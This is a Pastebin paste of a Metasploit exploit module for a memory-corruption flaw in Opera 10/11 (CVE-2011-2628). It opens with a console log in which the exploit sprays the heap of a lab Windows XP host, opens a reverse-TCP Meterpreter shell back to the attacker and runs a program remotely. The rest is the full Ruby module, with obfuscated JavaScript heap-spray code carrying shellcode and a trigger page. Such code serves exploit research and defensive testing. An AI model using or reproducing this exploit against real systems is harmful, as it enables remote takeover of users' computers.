API tools faq
paste
Guest User

Untitled

a guest
Oct 7th, 2011
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.95 KB | None | 0 0
raw download clone embed print report
  1. Running against Opera v10.62...
  2. #
  3. #
  4. # =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
  5. # + -- --=[ 741 exploits - 378 auxiliary - 82 post
  6. # + -- --=[ 228 payloads - 27 encoders - 8 nops
  7. # =[ svn r13801 updated 3 days ago (2011.09.27)
  8. #
  9. # msf > use windows/browser/opera_frameset_tag
  10. # msf exploit(opera_frameset_tag) > set payload windows/meterpreter/reverse_tcp
  11. # payload => windows/meterpreter/reverse_tcp
  12. # msf exploit(opera_frameset_tag) > set LHOST 192.168.1.103
  13. # LHOST => 192.168.1.103
  14. # msf exploit(opera_frameset_tag) > exploit
  15. # [*] Exploit running as background job.
  16. #
  17. # [*] Started reverse handler on 192.168.1.103:4444
  18. # msf exploit(opera_frameset_tag) >
  19. # [*] Using URL: http://0.0.0.0:8080/sUpFmezLW6jS
  20. # [*] Local IP: http://192.168.1.103:8080/sUpFmezLW6jS
  21. # [*] Server started.
  22. # [*] Sending Opera 10/11 (bad nesting with frameset tag) Memory Corruption to 192.168.1.104:1185 (target: Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default))
  23. # [*] Sending stage 1 (Spraying the heap)
  24. # [*] Sending stage 2 (Triggering the vulnerability)
  25. # [*] Sending stage 2 (Triggering the vulnerability)
  26. # [*] Sending stage 2 (Triggering the vulnerability)
  27. # [*] Sending stage (752128 bytes) to 192.168.1.104
  28. # [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.104:1190) at 2011-09-30 19:23:28 +0200
  29. # Interrupt: use the 'exit' command to quit
  30. # msf exploit(opera_frameset_tag) > sessions
  31. #
  32. # Active sessions
  33. # ===============
  34. #
  35. # Id Type Information Connection
  36. # -- ---- ----------- ----------
  37. # 1 meterpreter x86/win32 0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12 192.168.1.103:4444 -> 192.168.1.104:1190
  38. #
  39. # msf exploit(opera_frameset_tag) > sessions -i 1
  40. # [*] Starting interaction with 1...
  41. #
  42. # meterpreter > getuid
  43. # Server username: 0XDE1-A39ED4C12\0xde1
  44. # meterpreter > execute -f calc.exe
  45. # Process 1336 created.
  46. # meterpreter > exit
  47. # [*] Shutting down Meterpreter...
  48. # msf exploit(opera_frameset_tag) >
  49. #
  50. ################################################################################################################
  51.  
  52. require 'msf/core'
  53.  
  54. class Metasploit3 < Msf::Exploit::Remote
  55.  
  56. Rank = NormalRanking
  57.  
  58. include Msf::Exploit::Remote::HttpServer::HTML
  59.  
  60. def initialize(info = {})
  61.  
  62. super(update_info(info,
  63. 'Name' => 'Opera 10/11 (bad nesting with frameset tag) Memory Corruption',
  64. 'Description' => %q{
  65.  
  66. This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within
  67. Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses.
  68. Successfully exploiting leads to remote code execution or denial of service condition under Windows XP
  69. SP3 (DEP = off).
  70.  
  71. Note than most of cases, it won't work at first attempt and need crash-dialog interaction.
  72. Read the last reference for further details.
  73.  
  74. },
  75. 'License' => MSF_LICENSE,
  76. 'Author' =>
  77. [
  78. 'Jose A. Vazquez'
  79. ],
  80. 'Version' => '$Revision: 0011 $',
  81. 'References' =>
  82. [
  83. ['CVE', '2011-2628'],
  84. ['OSVDB', '72406'],
  85. ['BID', '47906'],
  86. ['URL', 'http://www.opera.com/support/kb/view/992/'],
  87. ['URL', 'http://www.beyondsecurity.com/ssd.html'],
  88. ['URL', 'http://spa-s3c.blogspot.com/2011/05/spas3c-sv-004opera-browser-1111.html'],
  89. ['URL', 'http://spa-s3c.blogspot.com/2011/09/spas3c-sv-004reliability-tests-ssd.html']
  90. ],
  91. 'DefaultOptions' =>
  92. {
  93. 'EXITFUNC' => 'process',
  94. 'HTTP::compression' => 'gzip',
  95. 'HTTP::chunked' => true
  96. },
  97. 'Payload' =>
  98. {
  99. 'Space' => 1000,
  100. 'BadChars' => "\x00",
  101. 'Compat' =>
  102. {
  103. 'ConnectionType' => '-find',
  104. },
  105. 'StackAdjustment' => -3500
  106. },
  107. 'Platform' => 'win',
  108. 'Targets' =>
  109. [
  110. # Automatic
  111. [ 'Automatic',
  112. {}
  113. ],
  114.  
  115. # Opera > v10.54 ~ spray of 350 MB
  116. [ 'Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default)',
  117. {
  118. 'SizeofSpray' => 700,
  119. 'Ret' => 0x0c0c0c0c
  120. }
  121. ],
  122.  
  123. # Opera <= v10.54 ~ spray of 250 MB
  124. [ 'Opera Browser (v10.50 - v10.54) / Windows XP SP3 (DEP-default)',
  125. {
  126. 'SizeofSpray' => 500,
  127. 'Ret' => 0x0c0c0c0c
  128. }
  129. ],
  130.  
  131. # Opera < v10.50 doesn't get crashed with previous method and it needs this one.
  132. [ 'Opera Browser (v10.00 - v10.10) / Windows XP SP3 (DEP-default)',
  133. {
  134. 'SizeofSpray' => 500,
  135. 'Ret' => 0x0c0c0c0c
  136. }
  137. ]
  138. ],
  139. 'DisclosureDate' => '5 October 2011',
  140. 'DefaultTarget' => 0))
  141.  
  142. end
  143.  
  144. #I don't know if Msf::Exploit::Remote::BrowserAutopwn works, but I'm going to include my own auto-target selection
  145.  
  146. def automatic_target(cli, request)
  147.  
  148. thistarget = nil
  149.  
  150. agent = request.headers['User-Agent']
  151.  
  152. if agent =~ /Version\/10\.00/ or agent =~ /Version\/10\.01/ or agent =~ /Version\/10\.10/
  153. thistarget = targets[3]
  154. elsif agent =~ /Version\/10\.50/ or agent =~ /Version\/10\.51/ or agent =~ /Version\/10\.52/ or agent =~ /Version\/10\.53/ or agent =~ /Version\/10\.54/
  155. thistarget = targets[2]
  156. else
  157. thistarget = targets[1]
  158. end
  159.  
  160. thistarget
  161.  
  162. end
  163.  
  164. def on_request_uri(cli, request)
  165.  
  166. mytarget = target
  167.  
  168. if target.name == 'Automatic'
  169. mytarget = automatic_target(cli, request)
  170. end
  171.  
  172. if(request.uri =~ /\.xhtml$/)
  173.  
  174. #Send file for trigger the vulnerability for cases > v10.10
  175.  
  176. html = %Q|
  177. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
  178. <meta http-equiv="refresh" content="0;url=" />
  179. <xht:frameset>
  180. <xht:iframe>
  181. <xht:script>
  182. rbc
  183. </xht:script>
  184. <style type="text/css">
  185. <!-- /* padding CSS */
  186.  
  187. approx:root{
  188. font: 333em;
  189. }
  190. -->
  191. </style>
  192. </xht:iframe>
  193. </xht:frameset>
  194. </html>
  195. |
  196.  
  197. #Send triggerer
  198.  
  199. print_status("Sending stage 2 (Triggering the vulnerability)")
  200.  
  201. var_contentype = 'application/xhtml+xml'
  202.  
  203. else
  204.  
  205. #Send payload + hide iframe for trigger the vuln
  206.  
  207. #Re-generate the payload
  208.  
  209. return if ((p = regenerate_payload(cli)) == nil)
  210.  
  211. #Encode the shellcode
  212.  
  213. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
  214.  
  215. #Ret
  216.  
  217. addr_word = [mytarget.ret].pack('V').unpack('H*')[0][0,4]
  218.  
  219. #Randomize the javascript variable names
  220.  
  221. var_buffer = rand_text_alpha(rand(30)+2)
  222. var_shellcode = rand_text_alpha(rand(30)+2)
  223. var_unescape = rand_text_alpha(rand(30)+2)
  224. var_x = rand_text_alpha(rand(30)+2)
  225. var_i = rand_text_alpha(rand(30)+2)
  226.  
  227. var_size = rand_text_alpha(rand(30)+2)
  228. var_nopsize = rand_text_alpha(rand(30)+2)
  229. var_limit = rand_text_alpha(rand(30)+2)
  230.  
  231. var_function_trigger = rand_text_alpha(rand(30)+2)
  232. var_file_trigger = rand_text_alpha(rand(30)+2)
  233.  
  234. var_timer_trigger = (rand(3) + 2) * 1000
  235.  
  236. #Build the exploit
  237.  
  238. var_url = ((datastore['SSL']) ? "https://" : "http://")
  239. var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
  240. var_url << ":" + datastore['SRVPORT']
  241. var_url << get_resource
  242.  
  243. #Sending init HTML
  244. print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})")
  245.  
  246. if mytarget.name =~ /v10.00/
  247.  
  248. # Case v10.00 - v10.10
  249.  
  250. html = %Q|
  251. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
  252. <xht:frameset>
  253. <xht:iframe>
  254. <xht:script>
  255. aaaaaa
  256. </xht:script>
  257. </xht:iframe>
  258. </xht:frameset>
  259. <script type="text/javascript">
  260. <![CDATA[
  261. var #{var_unescape} = unescape;
  262. var #{var_shellcode} = #{var_unescape}("#{shellcode}");
  263.  
  264. var #{var_size} = #{var_shellcode}.length * 2;
  265. var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
  266. var #{var_buffer} = #{var_unescape}("%u#{addr_word}");
  267.  
  268. while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
  269. #{var_buffer} += #{var_buffer};
  270. }
  271.  
  272. var #{var_x} = new Array();
  273.  
  274. for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
  275. #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
  276. }
  277. setInterval("location.reload()", 500);
  278. ]]>
  279. </script>
  280. <html>
  281. |
  282.  
  283. print_status("Sending simple stage (Sprayer and Triggerer)")
  284. var_contentype = 'application/xhtml+xml'
  285.  
  286. else
  287.  
  288. # Case > v10.10
  289.  
  290. html = %Q|
  291. <html>
  292. <head>
  293. <script type="text/javascript">
  294. var #{var_unescape} = unescape;
  295. var #{var_shellcode} = #{var_unescape}("#{shellcode}");
  296.  
  297. var #{var_size} = #{var_shellcode}.length * 2;
  298. var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
  299. var #{var_buffer} = #{var_unescape}("%u#{addr_word}");
  300.  
  301. while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
  302. #{var_buffer} += #{var_buffer};
  303. }
  304.  
  305. var #{var_x} = new Array();
  306.  
  307. for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
  308. #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
  309. }
  310.  
  311. function #{var_function_trigger}(){
  312. document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>");
  313. }
  314.  
  315. setTimeout('#{var_function_trigger}()',#{var_timer_trigger});
  316.  
  317. </script>
  318. </head>
  319. <html>
  320. |
  321.  
  322. print_status("Sending stage 1 (Spraying the heap)")
  323. var_contentype = 'text/html'
  324.  
  325. end
  326.  
  327. end
  328.  
  329. #Response
  330. send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' })
  331. #Handle the payload
  332. handler(cli)
  333.  
  334. end
  335.  
  336. end
  337.  
  338.  
  339. # [2011-10-06]
  340.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!